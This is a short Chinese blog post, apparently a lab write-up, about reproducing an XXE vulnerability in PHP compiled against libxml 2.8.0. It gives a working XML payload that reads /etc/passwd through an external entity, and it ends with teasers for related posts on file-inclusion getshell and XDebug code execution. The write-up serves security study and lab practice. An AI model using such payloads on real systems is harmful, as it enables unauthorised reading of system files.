PHP环境 XML外部实体注入漏洞(XXE)


PHP环境 XML外部实体注入漏洞(XXE)

环境介绍:

  • PHP 7.0.30
  • libxml 2.8.0

libxml2.9.0 以后,默认不解析外部实体,导致 XXE 漏洞逐渐消亡。为了演示 PHP 环境下的 XXE 漏洞,本例会将 libxml2.8.0 版本编译进 PHP 中。PHP 版本并不影响 XXE 利用。

dom.phpSimpleXMLElement.phpsimplexml_load_string.php 均可触发 XXE 漏洞,具体输出点请阅读这三个文件的代码。

漏洞复现

Simple XXE Payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>


文章作者: Geekby
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Geekby !
 上一篇
PHP文件包含漏洞(利用phpinfo) PHP文件包含漏洞(利用phpinfo)
PHP文件包含漏洞(利用phpinfo)PHP 文件包含漏洞中,如果找不到可以包含的文件,我们可以通过包含临时文件的方法来 getshell。因为临时文件名是随机的,如果目标网站上存在 phpinfo,则可以通过 phpinfo 来获取临时
2019-03-04
下一篇 
XDebug 远程调试漏洞(代码执行) XDebug 远程调试漏洞(代码执行)
XDebug 远程调试漏洞(代码执行)XDebug 是 PHP 的一个扩展,用于调试 PHP 代码。如果目标开启了远程调试模式,并设置 remote_connect_back = 1: xdebug.remote_connect_back
2019-03-04
  目录